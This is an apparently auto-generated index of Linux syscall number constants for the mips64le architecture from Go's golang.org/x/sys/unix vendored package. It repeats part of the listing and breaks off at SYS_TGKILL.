SYS_RESERVED177 = 5177 constant SYS_GETTID (line 187) | SYS_GETTID = 5178 constant SYS_READAHEAD (line 188) | SYS_READAHEAD = 5179 constant SYS_SETXATTR (line 189) | SYS_SETXATTR = 5180 constant SYS_LSETXATTR (line 190) | SYS_LSETXATTR = 5181 constant SYS_FSETXATTR (line 191) | SYS_FSETXATTR = 5182 constant SYS_GETXATTR (line 192) | SYS_GETXATTR = 5183 constant SYS_LGETXATTR (line 193) | SYS_LGETXATTR = 5184 constant SYS_FGETXATTR (line 194) | SYS_FGETXATTR = 5185 constant SYS_LISTXATTR (line 195) | SYS_LISTXATTR = 5186 constant SYS_LLISTXATTR (line 196) | SYS_LLISTXATTR = 5187 constant SYS_FLISTXATTR (line 197) | SYS_FLISTXATTR = 5188 constant SYS_REMOVEXATTR (line 198) | SYS_REMOVEXATTR = 5189 constant SYS_LREMOVEXATTR (line 199) | SYS_LREMOVEXATTR = 5190 constant SYS_FREMOVEXATTR (line 200) | SYS_FREMOVEXATTR = 5191 constant SYS_TKILL (line 201) | SYS_TKILL = 5192 constant SYS_RESERVED193 (line 202) | SYS_RESERVED193 = 5193 constant SYS_FUTEX (line 203) | SYS_FUTEX = 5194 constant SYS_SCHED_SETAFFINITY (line 204) | SYS_SCHED_SETAFFINITY = 5195 constant SYS_SCHED_GETAFFINITY (line 205) | SYS_SCHED_GETAFFINITY = 5196 constant SYS_CACHEFLUSH (line 206) | SYS_CACHEFLUSH = 5197 constant SYS_CACHECTL (line 207) | SYS_CACHECTL = 5198 constant SYS_SYSMIPS (line 208) | SYS_SYSMIPS = 5199 constant SYS_IO_SETUP (line 209) | SYS_IO_SETUP = 5200 constant SYS_IO_DESTROY (line 210) | SYS_IO_DESTROY = 5201 constant SYS_IO_GETEVENTS (line 211) | SYS_IO_GETEVENTS = 5202 constant SYS_IO_SUBMIT (line 212) | SYS_IO_SUBMIT = 5203 constant SYS_IO_CANCEL (line 213) | SYS_IO_CANCEL = 5204 constant SYS_EXIT_GROUP (line 214) | SYS_EXIT_GROUP = 5205 constant SYS_LOOKUP_DCOOKIE (line 215) | SYS_LOOKUP_DCOOKIE = 5206 constant SYS_EPOLL_CREATE (line 216) | SYS_EPOLL_CREATE = 5207 constant SYS_EPOLL_CTL (line 217) | SYS_EPOLL_CTL = 5208 constant SYS_EPOLL_WAIT (line 218) | SYS_EPOLL_WAIT = 5209 constant SYS_REMAP_FILE_PAGES (line 219) | SYS_REMAP_FILE_PAGES = 5210 constant SYS_RT_SIGRETURN (line 220) | SYS_RT_SIGRETURN = 5211 constant SYS_SET_TID_ADDRESS (line 221) | SYS_SET_TID_ADDRESS = 5212 constant SYS_RESTART_SYSCALL (line 222) | SYS_RESTART_SYSCALL = 5213 constant SYS_SEMTIMEDOP (line 223) | SYS_SEMTIMEDOP = 5214 constant SYS_FADVISE64 (line 224) | SYS_FADVISE64 = 5215 constant SYS_TIMER_CREATE (line 225) | SYS_TIMER_CREATE = 5216 constant SYS_TIMER_SETTIME (line 226) | SYS_TIMER_SETTIME = 5217 constant SYS_TIMER_GETTIME (line 227) | SYS_TIMER_GETTIME = 5218 constant SYS_TIMER_GETOVERRUN (line 228) | SYS_TIMER_GETOVERRUN = 5219 constant SYS_TIMER_DELETE (line 229) | SYS_TIMER_DELETE = 5220 constant SYS_CLOCK_SETTIME (line 230) | SYS_CLOCK_SETTIME = 5221 constant SYS_CLOCK_GETTIME (line 231) | SYS_CLOCK_GETTIME = 5222 constant SYS_CLOCK_GETRES (line 232) | SYS_CLOCK_GETRES = 5223 constant SYS_CLOCK_NANOSLEEP (line 233) | SYS_CLOCK_NANOSLEEP = 5224 constant SYS_TGKILL (line 234) | SYS_TGKILL = 5225 constant SYS_UTIMES (line 235) | SYS_UTIMES = 5226 constant SYS_MBIND (line 236) | SYS_MBIND = 5227 constant SYS_GET_MEMPOLICY (line 237) | SYS_GET_MEMPOLICY = 5228 constant SYS_SET_MEMPOLICY (line 238) | SYS_SET_MEMPOLICY = 5229 constant SYS_MQ_OPEN (line 239) | SYS_MQ_OPEN = 5230 constant SYS_MQ_UNLINK (line 240) | SYS_MQ_UNLINK = 5231 constant SYS_MQ_TIMEDSEND (line 241) | SYS_MQ_TIMEDSEND = 5232 constant SYS_MQ_TIMEDRECEIVE (line 242) | SYS_MQ_TIMEDRECEIVE = 5233 constant SYS_MQ_NOTIFY (line 243) | SYS_MQ_NOTIFY = 5234 constant SYS_MQ_GETSETATTR (line 244) | SYS_MQ_GETSETATTR = 5235 constant SYS_VSERVER (line 245) | SYS_VSERVER = 5236 constant SYS_WAITID (line 246) | SYS_WAITID = 5237 constant SYS_ADD_KEY (line 247) | SYS_ADD_KEY = 5239 constant SYS_REQUEST_KEY (line 248) | SYS_REQUEST_KEY = 5240 constant SYS_KEYCTL (line 249) | SYS_KEYCTL = 5241 constant SYS_SET_THREAD_AREA (line 250) | SYS_SET_THREAD_AREA = 5242 constant SYS_INOTIFY_INIT (line 251) | SYS_INOTIFY_INIT = 5243 constant SYS_INOTIFY_ADD_WATCH (line 252) | SYS_INOTIFY_ADD_WATCH = 5244 constant SYS_INOTIFY_RM_WATCH (line 253) | SYS_INOTIFY_RM_WATCH = 5245 constant SYS_MIGRATE_PAGES (line 254) | SYS_MIGRATE_PAGES = 5246 constant SYS_OPENAT (line 255) | SYS_OPENAT = 5247 constant SYS_MKDIRAT (line 256) | SYS_MKDIRAT = 5248 constant SYS_MKNODAT (line 257) | SYS_MKNODAT = 5249 constant SYS_FCHOWNAT (line 258) | SYS_FCHOWNAT = 5250 constant SYS_FUTIMESAT (line 259) | SYS_FUTIMESAT = 5251 constant SYS_NEWFSTATAT (line 260) | SYS_NEWFSTATAT = 5252 constant SYS_UNLINKAT (line 261) | SYS_UNLINKAT = 5253 constant SYS_RENAMEAT (line 262) | SYS_RENAMEAT = 5254 constant SYS_LINKAT (line 263) | SYS_LINKAT = 5255 constant SYS_SYMLINKAT (line 264) | SYS_SYMLINKAT = 5256 constant SYS_READLINKAT (line 265) | SYS_READLINKAT = 5257 constant SYS_FCHMODAT (line 266) | SYS_FCHMODAT = 5258 constant SYS_FACCESSAT (line 267) | SYS_FACCESSAT = 5259 constant SYS_PSELECT6 (line 268) | SYS_PSELECT6 = 5260 constant SYS_PPOLL (line 269) | SYS_PPOLL = 5261 constant SYS_UNSHARE (line 270) | SYS_UNSHARE = 5262 constant SYS_SPLICE (line 271) | SYS_SPLICE = 5263 constant SYS_SYNC_FILE_RANGE (line 272) | SYS_SYNC_FILE_RANGE = 5264 constant SYS_TEE (line 273) | SYS_TEE = 5265 constant SYS_VMSPLICE (line 274) | SYS_VMSPLICE = 5266 constant SYS_MOVE_PAGES (line 275) | SYS_MOVE_PAGES = 5267 constant SYS_SET_ROBUST_LIST (line 276) | SYS_SET_ROBUST_LIST = 5268 constant SYS_GET_ROBUST_LIST (line 277) | SYS_GET_ROBUST_LIST = 5269 constant SYS_KEXEC_LOAD (line 278) | SYS_KEXEC_LOAD = 5270 constant SYS_GETCPU (line 279) | SYS_GETCPU = 5271 constant SYS_EPOLL_PWAIT (line 280) | SYS_EPOLL_PWAIT = 5272 constant SYS_IOPRIO_SET (line 281) | SYS_IOPRIO_SET = 5273 constant SYS_IOPRIO_GET (line 282) | SYS_IOPRIO_GET = 5274 constant SYS_UTIMENSAT (line 283) | SYS_UTIMENSAT = 5275 constant SYS_SIGNALFD (line 284) | SYS_SIGNALFD = 5276 constant SYS_TIMERFD (line 285) | SYS_TIMERFD = 5277 constant SYS_EVENTFD (line 286) | SYS_EVENTFD = 5278 constant SYS_FALLOCATE (line 287) | SYS_FALLOCATE = 5279 constant SYS_TIMERFD_CREATE (line 288) | SYS_TIMERFD_CREATE = 5280 constant SYS_TIMERFD_GETTIME (line 289) | SYS_TIMERFD_GETTIME = 5281 constant SYS_TIMERFD_SETTIME (line 290) | SYS_TIMERFD_SETTIME = 5282 constant SYS_SIGNALFD4 (line 291) | SYS_SIGNALFD4 = 5283 constant SYS_EVENTFD2 (line 292) | SYS_EVENTFD2 = 5284 constant SYS_EPOLL_CREATE1 (line 293) | SYS_EPOLL_CREATE1 = 5285 constant SYS_DUP3 (line 294) | SYS_DUP3 = 5286 constant SYS_PIPE2 (line 295) | SYS_PIPE2 = 5287 constant SYS_INOTIFY_INIT1 (line 296) | SYS_INOTIFY_INIT1 = 5288 constant SYS_PREADV (line 297) | SYS_PREADV = 5289 constant SYS_PWRITEV (line 298) | SYS_PWRITEV = 5290 constant SYS_RT_TGSIGQUEUEINFO (line 299) | SYS_RT_TGSIGQUEUEINFO = 5291 constant SYS_PERF_EVENT_OPEN (line 300) | SYS_PERF_EVENT_OPEN = 5292 constant SYS_ACCEPT4 (line 301) | SYS_ACCEPT4 = 5293 constant SYS_RECVMMSG (line 302) | SYS_RECVMMSG = 5294 constant SYS_FANOTIFY_INIT (line 303) | SYS_FANOTIFY_INIT = 5295 constant SYS_FANOTIFY_MARK (line 304) | SYS_FANOTIFY_MARK = 5296 constant SYS_PRLIMIT64 (line 305) | SYS_PRLIMIT64 = 5297 constant SYS_NAME_TO_HANDLE_AT (line 306) | SYS_NAME_TO_HANDLE_AT = 5298 constant SYS_OPEN_BY_HANDLE_AT (line 307) | SYS_OPEN_BY_HANDLE_AT = 5299 constant SYS_CLOCK_ADJTIME (line 308) | SYS_CLOCK_ADJTIME = 5300 constant SYS_SYNCFS (line 309) | SYS_SYNCFS = 5301 constant SYS_SENDMMSG (line 310) | SYS_SENDMMSG = 5302 constant SYS_SETNS (line 311) | SYS_SETNS = 5303 constant SYS_PROCESS_VM_READV (line 312) | SYS_PROCESS_VM_READV = 5304 constant SYS_PROCESS_VM_WRITEV (line 313) | SYS_PROCESS_VM_WRITEV = 5305 constant SYS_KCMP (line 314) | SYS_KCMP = 5306 constant SYS_FINIT_MODULE (line 315) | SYS_FINIT_MODULE = 5307 constant SYS_GETDENTS64 (line 316) | SYS_GETDENTS64 = 5308 constant SYS_SCHED_SETATTR (line 317) | SYS_SCHED_SETATTR = 5309 constant SYS_SCHED_GETATTR (line 318) | SYS_SCHED_GETATTR = 5310 constant SYS_RENAMEAT2 (line 319) | SYS_RENAMEAT2 = 5311 constant SYS_SECCOMP (line 320) | SYS_SECCOMP = 5312 constant SYS_GETRANDOM (line 321) | SYS_GETRANDOM = 5313 constant SYS_MEMFD_CREATE (line 322) | SYS_MEMFD_CREATE = 5314 constant SYS_BPF (line 323) | SYS_BPF = 5315 constant SYS_EXECVEAT (line 324) | SYS_EXECVEAT = 5316 constant SYS_USERFAULTFD (line 325) | SYS_USERFAULTFD = 5317 constant SYS_MEMBARRIER (line 326) | SYS_MEMBARRIER = 5318 constant SYS_MLOCK2 (line 327) | SYS_MLOCK2 = 5319 constant SYS_COPY_FILE_RANGE (line 328) | SYS_COPY_FILE_RANGE = 5320 constant SYS_PREADV2 (line 329) | SYS_PREADV2 = 5321 constant SYS_PWRITEV2 (line 330) | SYS_PWRITEV2 = 5322 constant SYS_PKEY_MPROTECT (line 331) | SYS_PKEY_MPROTECT = 5323 constant SYS_PKEY_ALLOC (line 332) | SYS_PKEY_ALLOC = 5324 constant SYS_PKEY_FREE (line 333) | SYS_PKEY_FREE = 5325 constant SYS_STATX (line 334) | SYS_STATX = 5326 constant SYS_RSEQ (line 335) | SYS_RSEQ = 5327 constant SYS_IO_PGETEVENTS (line 336) | SYS_IO_PGETEVENTS = 5328 constant SYS_PIDFD_SEND_SIGNAL (line 337) | SYS_PIDFD_SEND_SIGNAL = 5424 constant SYS_IO_URING_SETUP (line 338) | SYS_IO_URING_SETUP = 5425 constant SYS_IO_URING_ENTER (line 339) | SYS_IO_URING_ENTER = 5426 constant SYS_IO_URING_REGISTER (line 340) | SYS_IO_URING_REGISTER = 5427 constant SYS_OPEN_TREE (line 341) | SYS_OPEN_TREE = 5428 constant SYS_MOVE_MOUNT (line 342) | SYS_MOVE_MOUNT = 5429 constant SYS_FSOPEN (line 343) | SYS_FSOPEN = 5430 constant SYS_FSCONFIG (line 344) | SYS_FSCONFIG = 5431 constant SYS_FSMOUNT (line 345) | SYS_FSMOUNT = 5432 constant SYS_FSPICK (line 346) | SYS_FSPICK = 5433 constant SYS_PIDFD_OPEN (line 347) | SYS_PIDFD_OPEN = 5434 constant SYS_CLONE3 (line 348) | SYS_CLONE3 = 5435 constant SYS_CLOSE_RANGE (line 349) | SYS_CLOSE_RANGE = 5436 constant SYS_OPENAT2 (line 350) | SYS_OPENAT2 = 5437 constant SYS_PIDFD_GETFD (line 351) | SYS_PIDFD_GETFD = 5438 constant SYS_FACCESSAT2 (line 352) | SYS_FACCESSAT2 = 5439 constant SYS_PROCESS_MADVISE (line 353) | SYS_PROCESS_MADVISE = 5440 constant SYS_EPOLL_PWAIT2 (line 354) | SYS_EPOLL_PWAIT2 = 5441 constant SYS_MOUNT_SETATTR (line 355) | SYS_MOUNT_SETATTR = 5442 constant SYS_QUOTACTL_FD (line 356) | SYS_QUOTACTL_FD = 5443 constant SYS_LANDLOCK_CREATE_RULESET (line 357) | SYS_LANDLOCK_CREATE_RULESET = 5444 constant SYS_LANDLOCK_ADD_RULE (line 358) | SYS_LANDLOCK_ADD_RULE = 5445 constant SYS_LANDLOCK_RESTRICT_SELF (line 359) | SYS_LANDLOCK_RESTRICT_SELF = 5446 constant SYS_PROCESS_MRELEASE (line 360) | SYS_PROCESS_MRELEASE = 5448 constant SYS_FUTEX_WAITV (line 361) | SYS_FUTEX_WAITV = 5449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 362) | SYS_SET_MEMPOLICY_HOME_NODE = 5450 constant SYS_CACHESTAT (line 363) | SYS_CACHESTAT = 5451 constant SYS_FCHMODAT2 (line 364) | SYS_FCHMODAT2 = 5452 constant SYS_MAP_SHADOW_STACK (line 365) | SYS_MAP_SHADOW_STACK = 5453 constant SYS_FUTEX_WAKE (line 366) | SYS_FUTEX_WAKE = 5454 constant SYS_FUTEX_WAIT (line 367) | SYS_FUTEX_WAIT = 5455 constant SYS_FUTEX_REQUEUE (line 368) | SYS_FUTEX_REQUEUE = 5456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_mips64le.go constant SYS_READ (line 9) | SYS_READ = 5000 constant SYS_WRITE (line 10) | SYS_WRITE = 5001 constant SYS_OPEN (line 11) | SYS_OPEN = 5002 constant SYS_CLOSE (line 12) | SYS_CLOSE = 5003 constant SYS_STAT (line 13) | SYS_STAT = 5004 constant SYS_FSTAT (line 14) | SYS_FSTAT = 5005 constant SYS_LSTAT (line 15) | SYS_LSTAT = 5006 constant SYS_POLL (line 16) | SYS_POLL = 5007 constant SYS_LSEEK (line 17) | SYS_LSEEK = 5008 constant SYS_MMAP (line 18) | SYS_MMAP = 5009 constant SYS_MPROTECT (line 19) | SYS_MPROTECT = 5010 constant SYS_MUNMAP (line 20) | SYS_MUNMAP = 5011 constant SYS_BRK (line 21) | SYS_BRK = 5012 constant SYS_RT_SIGACTION (line 22) | SYS_RT_SIGACTION = 5013 constant SYS_RT_SIGPROCMASK (line 23) | SYS_RT_SIGPROCMASK = 5014 constant SYS_IOCTL (line 24) | SYS_IOCTL = 5015 constant SYS_PREAD64 (line 25) | SYS_PREAD64 = 5016 constant SYS_PWRITE64 (line 26) | SYS_PWRITE64 = 5017 constant SYS_READV (line 27) | SYS_READV = 5018 constant SYS_WRITEV (line 28) | SYS_WRITEV = 5019 constant SYS_ACCESS (line 29) | SYS_ACCESS = 5020 constant SYS_PIPE (line 30) | SYS_PIPE = 5021 constant SYS__NEWSELECT (line 31) | SYS__NEWSELECT = 5022 constant SYS_SCHED_YIELD (line 32) | SYS_SCHED_YIELD = 5023 constant SYS_MREMAP (line 33) | SYS_MREMAP = 5024 constant SYS_MSYNC (line 34) | SYS_MSYNC = 5025 constant SYS_MINCORE (line 35) | SYS_MINCORE = 5026 constant SYS_MADVISE (line 36) | SYS_MADVISE = 5027 constant SYS_SHMGET (line 37) | SYS_SHMGET = 5028 constant SYS_SHMAT (line 38) | SYS_SHMAT = 5029 constant SYS_SHMCTL (line 39) | SYS_SHMCTL = 5030 constant SYS_DUP (line 40) | SYS_DUP = 5031 constant SYS_DUP2 (line 41) | SYS_DUP2 = 5032 constant SYS_PAUSE (line 42) | SYS_PAUSE = 5033 constant SYS_NANOSLEEP (line 43) | SYS_NANOSLEEP = 5034 constant SYS_GETITIMER (line 44) | SYS_GETITIMER = 5035 constant SYS_SETITIMER (line 45) | SYS_SETITIMER = 5036 constant SYS_ALARM (line 46) | SYS_ALARM = 5037 constant SYS_GETPID (line 47) | SYS_GETPID = 5038 constant SYS_SENDFILE (line 48) | SYS_SENDFILE = 5039 constant SYS_SOCKET (line 49) | SYS_SOCKET = 5040 constant SYS_CONNECT (line 50) | SYS_CONNECT = 5041 constant SYS_ACCEPT (line 51) | SYS_ACCEPT = 5042 constant SYS_SENDTO (line 52) | SYS_SENDTO = 5043 constant SYS_RECVFROM (line 53) | SYS_RECVFROM = 5044 constant SYS_SENDMSG (line 54) | SYS_SENDMSG = 5045 constant SYS_RECVMSG (line 55) | SYS_RECVMSG = 5046 constant SYS_SHUTDOWN (line 56) | SYS_SHUTDOWN = 5047 constant SYS_BIND (line 57) | SYS_BIND = 5048 constant SYS_LISTEN (line 58) | SYS_LISTEN = 5049 constant SYS_GETSOCKNAME (line 59) | SYS_GETSOCKNAME = 5050 constant SYS_GETPEERNAME (line 60) | SYS_GETPEERNAME = 5051 constant SYS_SOCKETPAIR (line 61) | SYS_SOCKETPAIR = 5052 constant SYS_SETSOCKOPT (line 62) | SYS_SETSOCKOPT = 5053 constant SYS_GETSOCKOPT (line 63) | SYS_GETSOCKOPT = 5054 constant SYS_CLONE (line 64) | SYS_CLONE = 5055 constant SYS_FORK (line 65) | SYS_FORK = 5056 constant SYS_EXECVE (line 66) | SYS_EXECVE = 5057 constant SYS_EXIT (line 67) | SYS_EXIT = 5058 constant SYS_WAIT4 (line 68) | SYS_WAIT4 = 5059 constant SYS_KILL (line 69) | SYS_KILL = 5060 constant SYS_UNAME (line 70) | SYS_UNAME = 5061 constant SYS_SEMGET (line 71) | SYS_SEMGET = 5062 constant SYS_SEMOP (line 72) | SYS_SEMOP = 5063 constant SYS_SEMCTL (line 73) | SYS_SEMCTL = 5064 constant SYS_SHMDT (line 74) | SYS_SHMDT = 5065 constant SYS_MSGGET (line 75) | SYS_MSGGET = 5066 constant SYS_MSGSND (line 76) | SYS_MSGSND = 5067 constant SYS_MSGRCV (line 77) | SYS_MSGRCV = 5068 constant SYS_MSGCTL (line 78) | SYS_MSGCTL = 5069 constant SYS_FCNTL (line 79) | SYS_FCNTL = 5070 constant SYS_FLOCK (line 80) | SYS_FLOCK = 5071 constant SYS_FSYNC (line 81) | SYS_FSYNC = 5072 constant SYS_FDATASYNC (line 82) | SYS_FDATASYNC = 5073 constant SYS_TRUNCATE (line 83) | SYS_TRUNCATE = 5074 constant SYS_FTRUNCATE (line 84) | SYS_FTRUNCATE = 5075 constant SYS_GETDENTS (line 85) | SYS_GETDENTS = 5076 constant SYS_GETCWD (line 86) | SYS_GETCWD = 5077 constant SYS_CHDIR (line 87) | SYS_CHDIR = 5078 constant SYS_FCHDIR (line 88) | SYS_FCHDIR = 5079 constant SYS_RENAME (line 89) | SYS_RENAME = 5080 constant SYS_MKDIR (line 90) | SYS_MKDIR = 5081 constant SYS_RMDIR (line 91) | SYS_RMDIR = 5082 constant SYS_CREAT (line 92) | SYS_CREAT = 5083 constant SYS_LINK (line 93) | SYS_LINK = 5084 constant SYS_UNLINK (line 94) | SYS_UNLINK = 5085 constant SYS_SYMLINK (line 95) | SYS_SYMLINK = 5086 constant SYS_READLINK (line 96) | SYS_READLINK = 5087 constant SYS_CHMOD (line 97) | SYS_CHMOD = 5088 constant SYS_FCHMOD (line 98) | SYS_FCHMOD = 5089 constant SYS_CHOWN (line 99) | SYS_CHOWN = 5090 constant SYS_FCHOWN (line 100) | SYS_FCHOWN = 5091 constant SYS_LCHOWN (line 101) | SYS_LCHOWN = 5092 constant SYS_UMASK (line 102) | SYS_UMASK = 5093 constant SYS_GETTIMEOFDAY (line 103) | SYS_GETTIMEOFDAY = 5094 constant SYS_GETRLIMIT (line 104) | SYS_GETRLIMIT = 5095 constant SYS_GETRUSAGE (line 105) | SYS_GETRUSAGE = 5096 constant SYS_SYSINFO (line 106) | SYS_SYSINFO = 5097 constant SYS_TIMES (line 107) | SYS_TIMES = 5098 constant SYS_PTRACE (line 108) | SYS_PTRACE = 5099 constant SYS_GETUID (line 109) | SYS_GETUID = 5100 constant SYS_SYSLOG (line 110) | SYS_SYSLOG = 5101 constant SYS_GETGID (line 111) | SYS_GETGID = 5102 constant SYS_SETUID (line 112) | SYS_SETUID = 5103 constant SYS_SETGID (line 113) | SYS_SETGID = 5104 constant SYS_GETEUID (line 114) | SYS_GETEUID = 5105 constant SYS_GETEGID (line 115) | SYS_GETEGID = 5106 constant SYS_SETPGID (line 116) | SYS_SETPGID = 5107 constant SYS_GETPPID (line 117) | SYS_GETPPID = 5108 constant SYS_GETPGRP (line 118) | SYS_GETPGRP = 5109 constant SYS_SETSID (line 119) | SYS_SETSID = 5110 constant SYS_SETREUID (line 120) | SYS_SETREUID = 5111 constant SYS_SETREGID (line 121) | SYS_SETREGID = 5112 constant SYS_GETGROUPS (line 122) | SYS_GETGROUPS = 5113 constant SYS_SETGROUPS (line 123) | SYS_SETGROUPS = 5114 constant SYS_SETRESUID (line 124) | SYS_SETRESUID = 5115 constant SYS_GETRESUID (line 125) | SYS_GETRESUID = 5116 constant SYS_SETRESGID (line 126) | SYS_SETRESGID = 5117 constant SYS_GETRESGID (line 127) | SYS_GETRESGID = 5118 constant SYS_GETPGID (line 128) | SYS_GETPGID = 5119 constant SYS_SETFSUID (line 129) | SYS_SETFSUID = 5120 constant SYS_SETFSGID (line 130) | SYS_SETFSGID = 5121 constant SYS_GETSID (line 131) | SYS_GETSID = 5122 constant SYS_CAPGET (line 132) | SYS_CAPGET = 5123 constant SYS_CAPSET (line 133) | SYS_CAPSET = 5124 constant SYS_RT_SIGPENDING (line 134) | SYS_RT_SIGPENDING = 5125 constant SYS_RT_SIGTIMEDWAIT (line 135) | SYS_RT_SIGTIMEDWAIT = 5126 constant SYS_RT_SIGQUEUEINFO (line 136) | SYS_RT_SIGQUEUEINFO = 5127 constant SYS_RT_SIGSUSPEND (line 137) | SYS_RT_SIGSUSPEND = 5128 constant SYS_SIGALTSTACK (line 138) | SYS_SIGALTSTACK = 5129 constant SYS_UTIME (line 139) | SYS_UTIME = 5130 constant SYS_MKNOD (line 140) | SYS_MKNOD = 5131 constant SYS_PERSONALITY (line 141) | SYS_PERSONALITY = 5132 constant SYS_USTAT (line 142) | SYS_USTAT = 5133 constant SYS_STATFS (line 143) | SYS_STATFS = 5134 constant SYS_FSTATFS (line 144) | SYS_FSTATFS = 5135 constant SYS_SYSFS (line 145) | SYS_SYSFS = 5136 constant SYS_GETPRIORITY (line 146) | SYS_GETPRIORITY = 5137 constant SYS_SETPRIORITY (line 147) | SYS_SETPRIORITY = 5138 constant SYS_SCHED_SETPARAM (line 148) | SYS_SCHED_SETPARAM = 5139 constant SYS_SCHED_GETPARAM (line 149) | SYS_SCHED_GETPARAM = 5140 constant SYS_SCHED_SETSCHEDULER (line 150) | SYS_SCHED_SETSCHEDULER = 5141 constant SYS_SCHED_GETSCHEDULER (line 151) | SYS_SCHED_GETSCHEDULER = 5142 constant SYS_SCHED_GET_PRIORITY_MAX (line 152) | SYS_SCHED_GET_PRIORITY_MAX = 5143 constant SYS_SCHED_GET_PRIORITY_MIN (line 153) | SYS_SCHED_GET_PRIORITY_MIN = 5144 constant SYS_SCHED_RR_GET_INTERVAL (line 154) | SYS_SCHED_RR_GET_INTERVAL = 5145 constant SYS_MLOCK (line 155) | SYS_MLOCK = 5146 constant SYS_MUNLOCK (line 156) | SYS_MUNLOCK = 5147 constant SYS_MLOCKALL (line 157) | SYS_MLOCKALL = 5148 constant SYS_MUNLOCKALL (line 158) | SYS_MUNLOCKALL = 5149 constant SYS_VHANGUP (line 159) | SYS_VHANGUP = 5150 constant SYS_PIVOT_ROOT (line 160) | SYS_PIVOT_ROOT = 5151 constant SYS__SYSCTL (line 161) | SYS__SYSCTL = 5152 constant SYS_PRCTL (line 162) | SYS_PRCTL = 5153 constant SYS_ADJTIMEX (line 163) | SYS_ADJTIMEX = 5154 constant SYS_SETRLIMIT (line 164) | SYS_SETRLIMIT = 5155 constant SYS_CHROOT (line 165) | SYS_CHROOT = 5156 constant SYS_SYNC (line 166) | SYS_SYNC = 5157 constant SYS_ACCT (line 167) | SYS_ACCT = 5158 constant SYS_SETTIMEOFDAY (line 168) | SYS_SETTIMEOFDAY = 5159 constant SYS_MOUNT (line 169) | SYS_MOUNT = 5160 constant SYS_UMOUNT2 (line 170) | SYS_UMOUNT2 = 5161 constant SYS_SWAPON (line 171) | SYS_SWAPON = 5162 constant SYS_SWAPOFF (line 172) | SYS_SWAPOFF = 5163 constant SYS_REBOOT (line 173) | SYS_REBOOT = 5164 constant SYS_SETHOSTNAME (line 174) | SYS_SETHOSTNAME = 5165 constant SYS_SETDOMAINNAME (line 175) | SYS_SETDOMAINNAME = 5166 constant SYS_CREATE_MODULE (line 176) | SYS_CREATE_MODULE = 5167 constant SYS_INIT_MODULE (line 177) | SYS_INIT_MODULE = 5168 constant SYS_DELETE_MODULE (line 178) | SYS_DELETE_MODULE = 5169 constant SYS_GET_KERNEL_SYMS (line 179) | SYS_GET_KERNEL_SYMS = 5170 constant SYS_QUERY_MODULE (line 180) | SYS_QUERY_MODULE = 5171 constant SYS_QUOTACTL (line 181) | SYS_QUOTACTL = 5172 constant SYS_NFSSERVCTL (line 182) | SYS_NFSSERVCTL = 5173 constant SYS_GETPMSG (line 183) | SYS_GETPMSG = 5174 constant SYS_PUTPMSG (line 184) | SYS_PUTPMSG = 5175 constant SYS_AFS_SYSCALL (line 185) | SYS_AFS_SYSCALL = 5176 constant SYS_RESERVED177 (line 186) | SYS_RESERVED177 = 5177 constant SYS_GETTID (line 187) | SYS_GETTID = 5178 constant SYS_READAHEAD (line 188) | SYS_READAHEAD = 5179 constant SYS_SETXATTR (line 189) | SYS_SETXATTR = 5180 constant SYS_LSETXATTR (line 190) | SYS_LSETXATTR = 5181 constant SYS_FSETXATTR (line 191) | SYS_FSETXATTR = 5182 constant SYS_GETXATTR (line 192) | SYS_GETXATTR = 5183 constant SYS_LGETXATTR (line 193) | SYS_LGETXATTR = 5184 constant SYS_FGETXATTR (line 194) | SYS_FGETXATTR = 5185 constant SYS_LISTXATTR (line 195) | SYS_LISTXATTR = 5186 constant SYS_LLISTXATTR (line 196) | SYS_LLISTXATTR = 5187 constant SYS_FLISTXATTR (line 197) | SYS_FLISTXATTR = 5188 constant SYS_REMOVEXATTR (line 198) | SYS_REMOVEXATTR = 5189 constant SYS_LREMOVEXATTR (line 199) | SYS_LREMOVEXATTR = 5190 constant SYS_FREMOVEXATTR (line 200) | SYS_FREMOVEXATTR = 5191 constant SYS_TKILL (line 201) | SYS_TKILL = 5192 constant SYS_RESERVED193 (line 202) | SYS_RESERVED193 = 5193 constant SYS_FUTEX (line 203) | SYS_FUTEX = 5194 constant SYS_SCHED_SETAFFINITY (line 204) | SYS_SCHED_SETAFFINITY = 5195 constant SYS_SCHED_GETAFFINITY (line 205) | SYS_SCHED_GETAFFINITY = 5196 constant SYS_CACHEFLUSH (line 206) | SYS_CACHEFLUSH = 5197 constant SYS_CACHECTL (line 207) | SYS_CACHECTL = 5198 constant SYS_SYSMIPS (line 208) | SYS_SYSMIPS = 5199 constant SYS_IO_SETUP (line 209) | SYS_IO_SETUP = 5200 constant SYS_IO_DESTROY (line 210) | SYS_IO_DESTROY = 5201 constant SYS_IO_GETEVENTS (line 211) | SYS_IO_GETEVENTS = 5202 constant SYS_IO_SUBMIT (line 212) | SYS_IO_SUBMIT = 5203 constant SYS_IO_CANCEL (line 213) | SYS_IO_CANCEL = 5204 constant SYS_EXIT_GROUP (line 214) | SYS_EXIT_GROUP = 5205 constant SYS_LOOKUP_DCOOKIE (line 215) | SYS_LOOKUP_DCOOKIE = 5206 constant SYS_EPOLL_CREATE (line 216) | SYS_EPOLL_CREATE = 5207 constant SYS_EPOLL_CTL (line 217) | SYS_EPOLL_CTL = 5208 constant SYS_EPOLL_WAIT (line 218) | SYS_EPOLL_WAIT = 5209 constant SYS_REMAP_FILE_PAGES (line 219) | SYS_REMAP_FILE_PAGES = 5210 constant SYS_RT_SIGRETURN (line 220) | SYS_RT_SIGRETURN = 5211 constant SYS_SET_TID_ADDRESS (line 221) | SYS_SET_TID_ADDRESS = 5212 constant SYS_RESTART_SYSCALL (line 222) | SYS_RESTART_SYSCALL = 5213 constant SYS_SEMTIMEDOP (line 223) | SYS_SEMTIMEDOP = 5214 constant SYS_FADVISE64 (line 224) | SYS_FADVISE64 = 5215 constant SYS_TIMER_CREATE (line 225) | SYS_TIMER_CREATE = 5216 constant SYS_TIMER_SETTIME (line 226) | SYS_TIMER_SETTIME = 5217 constant SYS_TIMER_GETTIME (line 227) | SYS_TIMER_GETTIME = 5218 constant SYS_TIMER_GETOVERRUN (line 228) | SYS_TIMER_GETOVERRUN = 5219 constant SYS_TIMER_DELETE (line 229) | SYS_TIMER_DELETE = 5220 constant SYS_CLOCK_SETTIME (line 230) | SYS_CLOCK_SETTIME = 5221 constant SYS_CLOCK_GETTIME (line 231) | SYS_CLOCK_GETTIME = 5222 constant SYS_CLOCK_GETRES (line 232) | SYS_CLOCK_GETRES = 5223 constant SYS_CLOCK_NANOSLEEP (line 233) | SYS_CLOCK_NANOSLEEP = 5224 constant SYS_TGKILL (line 234) | 